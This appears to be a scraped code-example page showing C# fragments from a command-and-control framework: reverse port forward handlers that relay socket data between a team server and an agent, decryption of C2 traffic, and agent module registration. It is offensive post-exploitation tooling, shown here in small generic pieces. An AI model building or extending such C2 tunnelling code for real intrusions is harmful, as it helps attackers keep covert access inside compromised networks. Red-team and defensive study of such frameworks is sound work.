Example #1
0
 private void DataFromTeamServer(byte[] data)
 {
     try
     {
         var packet = Serialisation.DeserialiseData <ReversePortForwardPacket>(data);
         InboundPackets.Add(packet);
     }
     catch (Exception e)
     {
         Agent.SendError(e.Message);
     }
 }
Example #2
0
 private void DataFromTeamServer(byte[] data)
 {
     try
     {
         var packet = Serialisation.DeserialiseData <ReversePortForwardPacket>(Convert.FromBase64String(Encoding.UTF8.GetString(data)));
         InboundPackets.Add(packet);
     }
     catch (Exception e)
     {
         Agent.SendError(e.Message);
     }
 }
Example #3
0
        public T Decrypt <T>(byte[] data)
        {
            var iv   = new byte[16];
            var hmac = new byte[32];
            var enc  = new byte[data.Length - iv.Length - hmac.Length];

            Buffer.BlockCopy(data, 0, iv, 0, iv.Length);
            Buffer.BlockCopy(data, enc.Length, hmac, 0, hmac.Length);
            Buffer.BlockCopy(data, iv.Length, enc, 0, enc.Length);

            var decrypted    = Cryptography.Decrypt(enc, EncryptionKey, iv);
            var decompressed = Common.Helpers.Decompress(decrypted);

            return(Serialisation.DeserialiseData <T>(decompressed));
        }
        private void DataFromAgent(AgentMetadata metadata, C2Data c2Data)
        {
            var packet = Serialisation.DeserialiseData <ReversePortForwardPacket>(c2Data.Data);

            if (!IPAddress.TryParse(packet.ForwardHost, out IPAddress ipAddress))
            {
                ipAddress = Dns.GetHostEntry(packet.ForwardHost).AddressList[0];
            }

            var endPoint = new IPEndPoint(ipAddress, packet.ForwardPort);
            var sender   = new Socket(ipAddress.AddressFamily, SocketType.Stream, ProtocolType.IP);

            sender.Connect(endPoint);
            var bytesSent = sender.Send(packet.Data);

            if (bytesSent > 0)
            {
                Log.Logger.Information("MODULE {ModuleName} {Data}", "ReversePortForward", $"{bytesSent} bytes sent");
            }

            var buffer    = new byte[65535];
            var bytesRecv = sender.Receive(buffer);

            if (bytesRecv > 0)
            {
                packet.Data = buffer.TrimBytes();

                Agent.SendAgentCommand(new AgentCommandRequest
                {
                    AgentId = c2Data.AgentID,
                    Module  = "rportfwd",
                    Command = "DataFromTeamServer",
                    Data    = Convert.ToBase64String(Serialisation.SerialiseData(packet))
                }, null);
            }

            sender.Shutdown(SocketShutdown.Both);
            sender.Close();
        }
Example #5
0
        private void RegisterAgentModule(AgentMetadata metadata, C2Data c2Data)
        {
            var moduleInfo = Serialisation.DeserialiseData <AgentModule>(c2Data.Data);

            Agent.RegisterAgentModule(metadata, moduleInfo);
        }